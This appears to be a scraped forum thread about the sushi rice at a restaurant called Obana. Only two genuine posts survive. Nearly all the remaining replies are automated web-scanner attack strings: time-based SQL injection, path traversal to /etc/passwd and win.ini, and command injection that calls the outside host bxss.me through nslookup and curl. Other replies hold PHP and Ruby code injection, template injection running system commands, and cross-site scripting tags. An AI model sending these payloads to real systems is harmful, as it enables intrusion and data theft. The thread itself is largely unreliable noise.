'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@nSVB7
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Hi! Have anyone visited Obana recently?
Heard a lot of good things about his neta but I would like to know his shari style. Thanks!
re: guest
1BCSQ4MIQ30
re: guest
response.write(9456824*9114135)
re: guest
'+response.write(9456824*9114135)+'
re: guest
"+response.write(9456824*9114135)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
${9999603+9999023}
re: guest
file:///etc/passwd
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
redirtest.acx
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
echo iwqqjc$()\ aldbli\nz^xyu||a #' &echo iwqqjc$()\ aldbli\nz^xyu||a #|" &echo iwqqjc$()\ aldbli\nz^xyu||a #
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
'.gethostbyname(lc('hituk'.'dkgswdaec9067.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(90).chr(110).chr(90).'
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
&echo mdmrpl$()\ eftvgr\nz^xyu||a #' &echo mdmrpl$()\ eftvgr\nz^xyu||a #|" &echo mdmrpl$()\ eftvgr\nz^xyu||a #
re: guest
".gethostbyname(lc("hittw"."qknbalhv063c2.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(77).chr(117).chr(83)."
re: guest
/etc/shells
re: guest
|echo yilons$()\ dejyzy\nz^xyu||a #' |echo yilons$()\ dejyzy\nz^xyu||a #|" |echo yilons$()\ dejyzy\nz^xyu||a #
re: guest
gethostbyname(lc('hitoh'.'wjhwujlg59fb4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(90).chr(122).chr(81)
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
expr 9000340275 - 963987
re: guest
c:/windows/win.ini
re: guest
(nslookup -q=cname hitzxxfcyitoub671a.bxss.me||curl hitzxxfcyitoub671a.bxss.me))
re: guest
$(nslookup -q=cname hitfjvnkgqjuabad71.bxss.me||curl hitfjvnkgqjuabad71.bxss.me)
re: guest
bxss.me
re: guest
&nslookup -q=cname hitlxcsbeluiz81667.bxss.me&'\"`0&nslookup -q=cname hitlxcsbeluiz81667.bxss.me&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
&(nslookup -q=cname hitmuvdidktkm6dc10.bxss.me||curl hitmuvdidktkm6dc10.bxss.me)&'\"`0&(nslookup -q=cname hitmuvdidktkm6dc10.bxss.me||curl hitmuvdidktkm6dc10.bxss.me)&`'
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
|(nslookup -q=cname hitikctqtnolpebb2f.bxss.me||curl hitikctqtnolpebb2f.bxss.me)
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
`(nslookup -q=cname hitkinqopiwne7769f.bxss.me||curl hitkinqopiwne7769f.bxss.me)`
re: guest
';print(md5(31337));$a='
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
;(nslookup -q=cname hityokgtxyaukf1ad3.bxss.me||curl hityokgtxyaukf1ad3.bxss.me)|(nslookup -q=cname hityokgtxyaukf1ad3.bxss.me||curl hityokgtxyaukf1ad3.bxss.me)&(nslookup -q=cname hityokgtxyaukf1ad3.bxss.me||curl hityokgtxyaukf1ad3.bxss.me)
re: guest
";print(md5(31337));$a="
re: guest
'"()
re: guest
bxss.me/t/xss.html?%00
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitbmghunfvvm9e60f.bxss.me||curl${IFS}hitbmghunfvvm9e60f.bxss.me)
re: guest
${@print(md5(31337))}
re: guest
'&&sleep(27*1000)*ugpilq&&'
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hituiboaotxmaf48d5.bxss.me||curl${IFS}hituiboaotxmaf48d5.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hituiboaotxmaf48d5.bxss.me||curl${IFS}hituiboaotxmaf48d5.bxss.me)&`'
re: guest
${@print(md5(31337))}\
re: guest
"&&sleep(27*1000)*aypjan&&"
re: guest
"+"A".concat(70-3).concat(22*4).concat(106).concat(77).concat(100).concat(76)+(require"socket"
Socket.gethostbyname("hitwo"+"nxeyxqgw8665e.bxss.me.")[3].to_s)+"
re: guest
'.print(md5(31337)).'
re: guest
'||sleep(27*1000)*iepayq||'
re: guest
'+'A'.concat(70-3).concat(22*4).concat(121).concat(76).concat(110).concat(82)+(require'socket'
Socket.gethostbyname('hituv'+'ilagfqha196fd.bxss.me.')[3].to_s)+'
re: guest
"||sleep(27*1000)*myzmgn||"
re: guest
'A'.concat(70-3).concat(22*4).concat(110).concat(68).concat(119).concat(71)+(require'socket'
Socket.gethostbyname('hitdd'+'xrsroitqa3629.bxss.me.')[3].to_s)
re: guest
replies
re: guest
'"
re: guest
replies�
re: guest
<!--
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >WbKr(9861)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitijeijuppmpe6645.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >WbKr(9469)</ScRiPt>
re: guest
9951088
re: guest
3m8s54oE
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
pwfifs7z'; waitfor delay '0:0:15' --
re: guest
-1 OR 148=(SELECT 148 FROM PG_SLEEP(15))--
re: guest
-1) OR 910=(SELECT 910 FROM PG_SLEEP(15))--
re: guest
-1)) OR 314=(SELECT 314 FROM PG_SLEEP(15))--
re: guest
di6bzkVH' OR 922=(SELECT 922 FROM PG_SLEEP(15))--
re: guest
65wwe4j8') OR 900=(SELECT 900 FROM PG_SLEEP(15))--
re: guest
OVJiBuCS')) OR 607=(SELECT 607 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@rsJb4
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Large al dente grains, medium-strong akazu
re: Eric Yu
1BDLY8AIS40
re: Eric Yu
response.write(9326029*9249288)
re: Eric Yu
'+response.write(9326029*9249288)+'
re: Eric Yu
"+response.write(9326029*9249288)+"
re: Eric Yu
../../../../../../../../../../../../../../etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../windows/win.ini
re: Eric Yu
file:///etc/passwd
re: Eric Yu
<esi:include src="http://bxss.me/rpb.png"/>
re: Eric Yu
${9999366+9999916}
re: Eric Yu
../
re: Eric Yu
)
re: Eric Yu
!(()&&!|*|*|
re: Eric Yu
^(#$!@#$)(()))******
re: Eric Yu
redirtest.acx
re: Eric Yu
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Eric Yu
echo jwzclo$()\ ntepce\nz^xyu||a #' &echo jwzclo$()\ ntepce\nz^xyu||a #|" &echo jwzclo$()\ ntepce\nz^xyu||a #
re: Eric Yu
&echo yfztuv$()\ lztspm\nz^xyu||a #' &echo yfztuv$()\ lztspm\nz^xyu||a #|" &echo yfztuv$()\ lztspm\nz^xyu||a #
re: Eric Yu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Eric Yu
|echo rxvqhy$()\ xkklhn\nz^xyu||a #' |echo rxvqhy$()\ xkklhn\nz^xyu||a #|" |echo rxvqhy$()\ xkklhn\nz^xyu||a #
re: Eric Yu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Eric Yu
expr 9000886458 - 924119
re: Eric Yu
'.gethostbyname(lc('hitej'.'qiltpgwx8b65c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(76).chr(99).chr(78).'
re: Eric Yu
/etc/shells
re: Eric Yu
(nslookup -q=cname hitwqekmurjnf1e2bb.bxss.me||curl hitwqekmurjnf1e2bb.bxss.me))
re: Eric Yu
".gethostbyname(lc("hitmk"."bgixyddld5220.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(84).chr(112).chr(89)."
re: Eric Yu
../../../../../../../../../../../../../../etc/shells
re: Eric Yu
$(nslookup -q=cname hitlkthpciwhwe1e81.bxss.me||curl hitlkthpciwhwe1e81.bxss.me)
re: Eric Yu
gethostbyname(lc('hitdu'.'wkbrahlbeae8a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(66).chr(105).chr(72)
re: Eric Yu
c:/windows/win.ini
re: Eric Yu
&nslookup -q=cname hitxoyizaukdnc5e79.bxss.me&'\"`0&nslookup -q=cname hitxoyizaukdnc5e79.bxss.me&`'
re: Eric Yu
bxss.me
re: Eric Yu
&(nslookup -q=cname hitlrzaeiaexz76304.bxss.me||curl hitlrzaeiaexz76304.bxss.me)&'\"`0&(nslookup -q=cname hitlrzaeiaexz76304.bxss.me||curl hitlrzaeiaexz76304.bxss.me)&`'
re: Eric Yu
Http://bxss.me/t/fit.txt
re: Eric Yu
|(nslookup -q=cname hitlihsmcddece3c97.bxss.me||curl hitlihsmcddece3c97.bxss.me)
re: Eric Yu
http://bxss.me/t/fit.txt?.jpg
re: Eric Yu
`(nslookup -q=cname hitagpcdwdell74cf7.bxss.me||curl hitagpcdwdell74cf7.bxss.me)`
re: Eric Yu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Eric Yu
;(nslookup -q=cname hitiggspymqdw11f85.bxss.me||curl hitiggspymqdw11f85.bxss.me)|(nslookup -q=cname hitiggspymqdw11f85.bxss.me||curl hitiggspymqdw11f85.bxss.me)&(nslookup -q=cname hitiggspymqdw11f85.bxss.me||curl hitiggspymqdw11f85.bxss.me)
re: Eric Yu
HttP://bxss.me/t/xss.html?%00
re: Eric Yu
';print(md5(31337));$a='
re: Eric Yu
|(nslookup${IFS}-q${IFS}cname${IFS}hitwvveqturlfa0de6.bxss.me||curl${IFS}hitwvveqturlfa0de6.bxss.me)
re: Eric Yu
bxss.me/t/xss.html?%00
re: Eric Yu
";print(md5(31337));$a="
re: Eric Yu
&(nslookup${IFS}-q${IFS}cname${IFS}hitotcibmydav7d366.bxss.me||curl${IFS}hitotcibmydav7d366.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitotcibmydav7d366.bxss.me||curl${IFS}hitotcibmydav7d366.bxss.me)&`'
re: Eric Yu
${@print(md5(31337))}
re: Eric Yu
${@print(md5(31337))}\
re: Eric Yu
'.print(md5(31337)).'
re: Eric Yu
'"()
re: Eric Yu
"+"A".concat(70-3).concat(22*4).concat(110).concat(73).concat(109).concat(66)+(require"socket"
Socket.gethostbyname("hitvr"+"hljnmlns384c8.bxss.me.")[3].to_s)+"
re: Eric Yu
'&&sleep(27*1000)*hccchd&&'
re: Eric Yu
'+'A'.concat(70-3).concat(22*4).concat(98).concat(67).concat(116).concat(90)+(require'socket'
Socket.gethostbyname('hitsr'+'omfomuww713da.bxss.me.')[3].to_s)+'
re: Eric Yu
"&&sleep(27*1000)*basbsf&&"
re: Eric Yu
'A'.concat(70-3).concat(22*4).concat(113).concat(68).concat(110).concat(70)+(require'socket'
Socket.gethostbyname('hitzq'+'itdnmgfkfc30e.bxss.me.')[3].to_s)
re: Eric Yu
'||sleep(27*1000)*wkycfn||'
re: Eric Yu
"||sleep(27*1000)*exzzzu||"
re: Eric Yu
replies
re: Eric Yu
replies�
re: Eric Yu
'"
re: Eric Yu
replies/.
re: Eric Yu
<!--
re: Eric Yu
'"()&%<zzz><ScRiPt >2XIT(9421)</ScRiPt>
re: Eric Yu
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitezftbgebjs9781f.bxss.me")}}
re: Eric Yu
'"()&%<zzz><ScRiPt >2XIT(9949)</ScRiPt>
re: Eric Yu
9417908
re: Eric Yu
pJMKzTcX
re: Eric Yu
*1
re: Eric Yu
*1
re: Eric Yu
*1
re: Eric Yu
*1
re: Eric Yu
-1 OR 5*5=25 --
re: Eric Yu
-1 OR 5*5=26 --
re: Eric Yu
-1 OR 5*5=25
re: Eric Yu
-1 OR 5*5=26
re: Eric Yu
*if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
-1 waitfor delay '0:0:15' --
re: Eric Yu
b8PTDmqF'; waitfor delay '0:0:15' --
re: Eric Yu
-1 OR 391=(SELECT 391 FROM PG_SLEEP(15))--
re: Eric Yu
-1) OR 75=(SELECT 75 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 339=(SELECT 339 FROM PG_SLEEP(15))--
re: Eric Yu
w050ADpK' OR 220=(SELECT 220 FROM PG_SLEEP(15))--
re: Eric Yu
NdnixpZz') OR 77=(SELECT 77 FROM PG_SLEEP(15))--
re: Eric Yu
Wyz6L1D5')) OR 494=(SELECT 494 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
'"
re: Eric Yu
@@iSnsi
re: Eric Yu
(select 198766*667891)
re: Eric Yu
(select 198766*667891 from DUAL)